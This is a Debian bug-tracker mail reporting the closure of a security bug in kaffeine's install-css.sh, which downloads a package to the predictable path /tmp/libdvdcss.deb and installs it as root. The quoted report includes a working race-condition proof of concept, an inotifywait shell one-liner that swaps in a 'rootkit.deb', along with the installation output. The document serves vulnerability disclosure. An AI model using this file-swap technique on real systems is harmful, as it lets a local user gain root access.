[Pkg-kde-extras] Bug#554772: marked as done (install-css.sh: insecure temporary file /tmp/libdvdcss.deb)

Mon, 09 Aug 2010 06:33:41 -0700 

Your message dated Mon, 09 Aug 2010 15:30:48 +0200
with message-id <2flfwynoquv....@login2.uio.no>
and subject line Re: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
has caused the Debian Bug report #554772,
regarding install-css.sh: insecure temporary file /tmp/libdvdcss.deb
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
554772: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=554772
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm 
/tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/install-css.sh

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46--  
http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...


-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information

--- End Message ---
--- Begin Message --- 
Version: 1.0-1

I had a look in version 1.0-1 in testing, and the
/usr/share/doc/kaffeine/install-css.sh no longer exist in the package.
Because of this, I believe this bug can be closed.

Did not find anything about its removal in the debian changelog, so I
do not know which in version it was taken away.

Happy hacking,
-- 
Petter Reinholdtsen

--- End Message ---
_______________________________________________
pkg-kde-extras mailing list
pkg-kde-extras@lists.alioth.debian.org
http://lists.alioth.debian.org/mailman/listinfo/pkg-kde-extras

Reply via email to